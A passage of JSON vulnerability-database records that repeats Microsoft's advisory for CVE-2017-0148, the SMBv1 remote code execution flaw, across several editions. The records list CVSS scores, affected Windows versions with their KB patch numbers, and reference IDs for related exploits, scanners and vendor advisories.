{"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-21T08:57:08", "differentElements": ["msAffectedSoftware"], "edition": 74}, {"bulletin": {"id": "MS:CVE-2017-0148", "hash": "47d8cff84559a6e03e5ea58b880c90dc", "type": "mscve", "bulletinFamily": "microsoft", 
"title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0148", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0148"], "immutableFields": [], "lastseen": "2021-09-21T10:46:37", "history": [], "viewCount": 107, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0148"]}, {"type": 
"symantec", "idList": ["SMNTC-96706"]}, {"type": "thn", "idList": ["THN:18A54BDD63D7DC2B3284D326E6510150"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:CE638F8710DF0090997AF6FB196E2595", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:7F979181993247D214BE9DB570C22482", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "nessus", "idList": ["700059.PRM", "SMB_NT_MS17-010.NASL", "MS17-010.NASL", "700099.PRM"]}, {"type": "zdt", "idList": ["1337DAY-ID-27752", "1337DAY-ID-33895", "1337DAY-ID-33313", "1337DAY-ID-27613", "1337DAY-ID-27786"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154690", "PACKETSTORM:156196", "PACKETSTORM:142181", "PACKETSTORM:142548"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:41891", "EDB-ID:47456"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE"]}, {"type": "kaspersky", "idList": ["KLA10977", "KLA11902", "KLA10979"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-21T10:46:37", "rev": 2}, "score": {"value": 7.3, 
"vector": "NONE", "modified": "2021-09-21T10:46:37", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB4012213", "KBMS16-110, 3187754", "KB4013198", "KB3210721", "KB4012214", "KB4012217", "KB4013429", "KB3213986", "KB4012212", "KB4012606", "KB4012216", "KB3210720", "KB3177186", "KB3205409", "KB3212646", "KB3205401", "KB4012598", "KB4012215"], "msrc": "", "mscve": "CVE-2017-0148", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for 
x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems 
Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-21T10:46:37", "differentElements": ["msAffectedSoftware"], "edition": 75}, {"bulletin": {"id": "MS:CVE-2017-0148", "hash": "1455b21b7b338994ddec7ae57c94d0af", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. 
An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0148", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0148"], "immutableFields": [], "lastseen": "2021-09-25T23:09:38", "history": [], "viewCount": 107, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0148"]}, {"type": "symantec", "idList": ["SMNTC-96706"]}, {"type": "thn", "idList": ["THN:18A54BDD63D7DC2B3284D326E6510150"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "rapid7community", "idList": 
["RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:CE638F8710DF0090997AF6FB196E2595", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:7F979181993247D214BE9DB570C22482", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "nessus", "idList": ["700059.PRM", "SMB_NT_MS17-010.NASL", "MS17-010.NASL", "700099.PRM"]}, {"type": "zdt", "idList": ["1337DAY-ID-27752", "1337DAY-ID-33895", "1337DAY-ID-33313", "1337DAY-ID-27613", "1337DAY-ID-27786"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154690", "PACKETSTORM:156196", "PACKETSTORM:142181", "PACKETSTORM:142548"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:41891", "EDB-ID:47456"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE"]}, {"type": "kaspersky", "idList": ["KLA10977", "KLA11902", "KLA10979"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-21T10:46:37", "rev": 2}, "score": {"value": 7.3, "vector": "NONE", "modified": "2021-09-21T10:46:37", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB4012213", "KB4012598", "KB4012215", "KB4012212", "KB4012214", "KB3205401", "KB4013198", "KBMS16-110, 
3187754", "KB4012216", "KB3177186", "KB4012606", "KB3210721", "KB4012217", "KB3205409", "KB3210720", "KB4013429", "KB3212646", "KB3213986"], "msrc": "", "mscve": "CVE-2017-0148", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 
(Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": 
""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", 
"kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, 
{"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-25T23:09:38", "differentElements": ["msAffectedSoftware"], "edition": 76}, {"bulletin": {"id": "MS:CVE-2017-0148", "hash": "47d8cff84559a6e03e5ea58b880c90dc", "type": "mscve", "bulletinFamily": "microsoft", 
"title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0148", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0148"], "immutableFields": [], "lastseen": "2021-09-26T00:46:05", "history": [], "viewCount": 107, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0148"]}, {"type": 
"symantec", "idList": ["SMNTC-96706"]}, {"type": "thn", "idList": ["THN:18A54BDD63D7DC2B3284D326E6510150"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:CE638F8710DF0090997AF6FB196E2595", "RAPID7COMMUNITY:7F979181993247D214BE9DB570C22482", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:41987", "EDB-ID:47456"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154690", "PACKETSTORM:156196", 